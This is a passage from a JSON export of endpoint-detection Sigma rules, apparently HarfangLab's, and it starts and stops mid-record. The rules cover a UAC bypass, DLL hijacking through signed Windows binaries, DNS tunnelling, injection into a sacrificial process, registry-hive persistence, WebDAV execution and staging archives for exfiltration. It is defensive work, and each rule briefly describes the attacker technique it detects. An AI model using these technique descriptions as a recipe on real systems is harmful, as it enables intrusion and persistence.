suspicious activities.\nreferences:\n - https://medium.com/@boutnaru/the-windows-process-journey-runlegacycplelevated-exe-93f040f78c54\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2025/03/10\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.RunLegacyCPLElevated\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n - ProcessName: 'RunLegacyCPLElevated.EXE'\n - ProcessOriginalFileName: 'RunLegacyCPLElevated.EXE'\n\n condition: selection\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2bc7247d-de5a-436c-a772-bb81fb27eda8", "rule_name": "RunLegacyCPLElevated Executed", "rule_description": "Detects the execution of RunLegacyCPLElevated.exe, a legitimate Windows binary used for running a legacy control panel applet in elevated mode.\nAdversaries may use RunLegacyCPLElevated to execute CPL file with high privileges.\nIt is recommended to check child processes of RunLegacyCPLElevated for suspicious activities.\n", "rule_creation_date": "2025-03-10", "rule_modified_date": "2025-04-08", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1548.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2bdea909-ca39-4efc-bb11-094f0831e19b", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.593230Z", "creation_date": "2026-03-23T11:45:34.593234Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.593242Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/xforcered/WFH", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_getmac.yml", "content": "title: DLL Hijacking via getmac.exe\nid: 2bdea909-ca39-4efc-bb11-094f0831e19b\ndescription: |\n Detects potential Windows DLL Hijacking via getmac.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'getmac.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\fastprox.dll'\n - '\\framedynos.dll'\n - '\\mpr.dll'\n - '\\netutils.dll'\n - '\\srvcli.dll'\n - '\\SspiCli.dll'\n - '\\wbemprox.dll'\n - '\\wbemsvc.dll'\n - '\\wkscli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2bdea909-ca39-4efc-bb11-094f0831e19b", "rule_name": "DLL Hijacking via getmac.exe", "rule_description": "Detects potential Windows DLL Hijacking via getmac.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2c30d455-a333-49ed-82ac-70467657685d", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.612914Z", "creation_date": "2026-03-23T11:45:34.612918Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.612956Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/", "https://attack.mitre.org/techniques/T1048/003/", "https://attack.mitre.org/techniques/T1568/003/" ], "name": "t1071_004_long_dns_request_linux.yml", "content": "title: Abnormally Long DNS Name Resolved (Linux)\nid: 2c30d455-a333-49ed-82ac-70467657685d\ndescription: |\n Detects an abnormally long DNS query, usually associated with DNS tunneling.\n Adversaries may use DNS protocol to communicate with their C&C.\n It is recommended to check the content of the request and for suspicious behavior by the process making the request.\nreferences:\n - https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/\n - https://attack.mitre.org/techniques/T1048/003/\n - https://attack.mitre.org/techniques/T1568/003/\ndate: 2024/09/26\nmodified: 2025/09/09\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.004\n - attack.exfiltration\n - attack.t1048.003\n - classification.Linux.Source.DnsQuery\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n product: linux\n category: dns_query\ndetection:\n selection:\n ProcessImage|contains: '?'\n QueryName|re: '[a-zA-Z0-9.-]{255}'\n\n exclusion_neterror:\n QueryName|startswith: 'about:neterror\\?e=redirectloop&u=https%3a//'\n\n exclusion_glpi:\n - ProcessImage: '/usr/bin/perl'\n ProcessCommandLine|contains: 'glpi-agent'\n - ProcessParentImage: '/usr/bin/perl'\n ProcessCommandLine|contains: 'glpi-agent'\n\n exclusion_nagios:\n ProcessParentImage: '/usr/sbin/nrpe'\n\n exclusion_puppet:\n ProcessParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2c30d455-a333-49ed-82ac-70467657685d", "rule_name": "Abnormally Long DNS Name Resolved (Linux)", "rule_description": "Detects an abnormally long DNS query, usually associated with DNS tunneling.\nAdversaries may use DNS protocol to communicate with their C&C.\nIt is recommended to check the content of the request and for suspicious behavior by the process making the request.\n", "rule_creation_date": "2024-09-26", "rule_modified_date": "2025-09-09", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control", "attack.exfiltration" ], "rule_technique_tags": [ "attack.t1048.003", "attack.t1071.004" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2c3aa5ca-f30f-4e2e-924d-43c8087144f4", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.079552Z", "creation_date": "2026-03-23T11:45:34.079554Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.079559Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/", "https://attack.mitre.org/techniques/T1055/" ], "name": "t1055_sacrificial_process_openwith.yml", "content": "title: OpenWith.exe Sacrificial Process Spawned\nid: 2c3aa5ca-f30f-4e2e-924d-43c8087144f4\ndescription: |\n Detects the suspicious execution of the legitimate OpenWith.exe Windows binary, spawned without arguments. This can mean that the binary is being used as sacrificial process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n This technique is used by Rhadamanthys, a malicious information stealer which is being distributed mostly via malicious Google advertisements.\n It is recommended to investigate the parent process performing this action and the destination IP address of the OpenWith.exe process to determine the legitimacy of this behavior.\nreferences:\n - https://research.checkpoint.com/2023/rhadamanthys-v0-5-0-a-deep-dive-into-the-stealers-components/\n - https://attack.mitre.org/techniques/T1055/\ndate: 2024/03/27\nmodified: 2025/08/25\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n CommandLine: '?:\\Windows\\System32\\OpenWith.exe'\n\n filter_parent:\n ParentImage:\n - '?:\\Windows\\explorer.exe'\n - '?:\\Windows\\System32\\sihost.exe'\n\n exclusion_rpcnet:\n ProcessAncestors: '?:\\Windows\\SysWOW64\\svchost.exe|?:\\Windows\\SysWOW64\\rpcnet.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2c3aa5ca-f30f-4e2e-924d-43c8087144f4", "rule_name": "OpenWith.exe Sacrificial Process Spawned", "rule_description": "Detects the suspicious execution of the legitimate OpenWith.exe Windows binary, spawned without arguments. This can mean that the binary is being used as sacrificial process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nThis technique is used by Rhadamanthys, a malicious information stealer which is being distributed mostly via malicious Google advertisements.\nIt is recommended to investigate the parent process performing this action and the destination IP address of the OpenWith.exe process to determine the legitimacy of this behavior.\n", "rule_creation_date": "2024-03-27", "rule_modified_date": "2025-08-25", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1055" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2c6b334b-a6f9-4041-8cdd-d91ebdaa6ba6", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.626477Z", "creation_date": "2026-03-23T11:45:34.626479Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.626483Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://deceptiq.com/blog/ntuser-man-registry-persistence", "https://attack.mitre.org/techniques/T1547/001/" ], "name": "t1547_001_registry_mandatory_profile.yml", "content": "title: User Registry Hive Hijacked via Mandatory Profile\nid: 2c6b334b-a6f9-4041-8cdd-d91ebdaa6ba6\ndescription: |\n Detects the creation or modification of an NTUSER.MAN file in a user profile directory.\n Attackers may plant a crafted NTUSER.MAN (mandatory user profile) file to load any registry keys into the user's HKCU hive at next logon without invoking registry APIs or triggering kernel registry callbacks, thus bypassing security solutions.\n It is recommended to validate whether the file creation is legitimate within your environment.\nreferences:\n - https://deceptiq.com/blog/ntuser-man-registry-persistence\n - https://attack.mitre.org/techniques/T1547/001/\ndate: 2026/01/08\nmodified: 2026/01/09\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1547.001\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_event\ndetection:\n selection:\n - Path: '?:\\Users\\\\*\\NTUSER.MAN'\n Kind: 'create'\n - TargetPath: '?:\\Users\\\\*\\NTUSER.MAN'\n Kind: 'rename'\n\n exclusion_profsvc:\n ProcessCommandLine:\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s ProfSvc'\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p -s ProfSvc'\n - '?:\\windows\\system32\\svchost.exe -k netsvcs'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2c6b334b-a6f9-4041-8cdd-d91ebdaa6ba6", "rule_name": "User Registry Hive Hijacked via Mandatory Profile", "rule_description": "Detects the creation or modification of an NTUSER.MAN file in a user profile directory.\nAttackers may plant a crafted NTUSER.MAN (mandatory user profile) file to load any registry keys into the user's HKCU hive at next logon without invoking registry APIs or triggering kernel registry callbacks, thus bypassing security solutions.\nIt is recommended to validate whether the file creation is legitimate within your environment.\n", "rule_creation_date": "2026-01-08", "rule_modified_date": "2026-01-09", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.persistence" ], "rule_technique_tags": [ "attack.t1547.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2cacb51e-86d2-4851-9e44-b3544e02427f", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.091445Z", "creation_date": "2026-03-23T11:45:34.091447Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.091452Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_fltmc.yml", "content": "title: DLL Hijacking via fltmc.exe\nid: 2cacb51e-86d2-4851-9e44-b3544e02427f\ndescription: |\n Detects potential Windows DLL Hijacking via fltmc.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fltmc.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\FLTLIB.DLL'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2cacb51e-86d2-4851-9e44-b3544e02427f", "rule_name": "DLL Hijacking via fltmc.exe", "rule_description": "Detects potential Windows DLL Hijacking via fltmc.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2ccca8c6-4fec-4f8e-a3eb-c4693b526b28", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.074206Z", "creation_date": "2026-03-23T11:45:34.074208Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.074212Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://cert.gov.ua/article/6276894", "https://attack.mitre.org/techniques/T1021/002/" ], "name": "t1021_002_execution_from_webdav.yml", "content": "title: Suspicious Execution from WebDAV Share\nid: 2ccca8c6-4fec-4f8e-a3eb-c4693b526b28\ndescription: |\n Detects the execution of a process from a WebDAV share.\n WebDAV is an unusual location for binaries to be executed from.\n Attackers can use distant WebDAV shares to executed malicious binaries from without having to put them on the infected system.\n Is it recommended to analyze the executed binary and look malicious content or behavior.\nreferences:\n - https://cert.gov.ua/article/6276894\n - https://attack.mitre.org/techniques/T1021/002/\ndate: 2024/01/26\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image:\n - '\\\\\\\\*@80\\\\*'\n - '\\\\\\\\*@443\\\\*'\n - '\\\\\\\\*@SSL\\\\*'\n\n condition: selection\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2ccca8c6-4fec-4f8e-a3eb-c4693b526b28", "rule_name": "Suspicious Execution from WebDAV Share", "rule_description": "Detects the execution of a process from a WebDAV share.\nWebDAV is an unusual location for binaries to be executed from.\nAttackers can use distant WebDAV shares to executed malicious binaries from without having to put them on the infected system.\nIs it recommended to analyze the executed binary and look malicious content or behavior.\n", "rule_creation_date": "2024-01-26", "rule_modified_date": "2025-03-06", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.lateral_movement" ], "rule_technique_tags": [ "attack.t1021.002" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2cdfd8e4-0fb6-42ec-83a6-010700352f20", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.600335Z", "creation_date": "2026-03-23T11:45:34.600339Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.600346Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://wietze.github.io/blog/save-the-environment-variables", "https://securityintelligence.com/posts/windows-features-dll-sideloading/", "https://github.com/xforcered/WFH", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_set.yml", "content": "title: DLL Hijacking via set.exe\nid: 2cdfd8e4-0fb6-42ec-83a6-010700352f20\ndescription: |\n Detects potential Windows DLL Hijacking via set.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'setx.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\sspicli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2cdfd8e4-0fb6-42ec-83a6-010700352f20", "rule_name": "DLL Hijacking via set.exe", "rule_description": "Detects potential Windows DLL Hijacking via set.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2022-09-15", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2d0520f1-59a9-4523-8001-7336ef5c28cc", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.618443Z", "creation_date": "2026-03-23T11:45:34.618445Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.618449Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/1560/001/" ], "name": "t1560_001_ditto_archive_creation.yml", "content": "title: Archive Created via ditto\nid: 2d0520f1-59a9-4523-8001-7336ef5c28cc\ndescription: |\n Detects a suspicious archive creation using the ditto MacOS utility.\n Adversaries may compress and/or encrypt collected data using ditto prior to exfiltration.\n It is recommended to check the processes leading to ditto's execution, the content of the archive, and any other alerts that may have been raised around this event.\nreferences:\n - https://attack.mitre.org/techniques/1560/001/\ndate: 2024/06/13\nmodified: 2025/03/27\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1560.001\n - attack.t1119\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Tool.Ditto\n - classification.macOS.Behavior.Collection\n - classification.macOS.Behavior.Exfiltration\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n Image|endswith: '/ditto'\n CommandLine|contains|all:\n - ' -c'\n - ' --sequesterRsrc'\n - ' --keepParent'\n\n exclusion_airwatch:\n ProcessParentImage: '/Library/Application Support/AirWatch/hublogd'\n\n exclusion_outlook:\n ProcessParentImage: '/Applications/Microsoft Outlook.app/Contents/MacOS/Microsoft Outlook'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2d0520f1-59a9-4523-8001-7336ef5c28cc", "rule_name": "Archive Created via ditto", "rule_description": "Detects a suspicious archive creation using the ditto MacOS utility.\nAdversaries may compress and/or encrypt collected data using ditto prior to exfiltration.\nIt is recommended to check the processes leading to ditto's execution, the content of the archive, and any other alerts that may have been raised around this event.\n", "rule_creation_date": "2024-06-13", "rule_modified_date": "2025-03-27", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [ "attack.collection" ], "rule_technique_tags": [ "attack.t1119", "attack.t1560.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2d125387-a98b-4b47-843e-3e6a3fb7b5eb", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.087464Z", "creation_date": "2026-03-23T11:45:34.087466Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.087470Z", "rule_level": 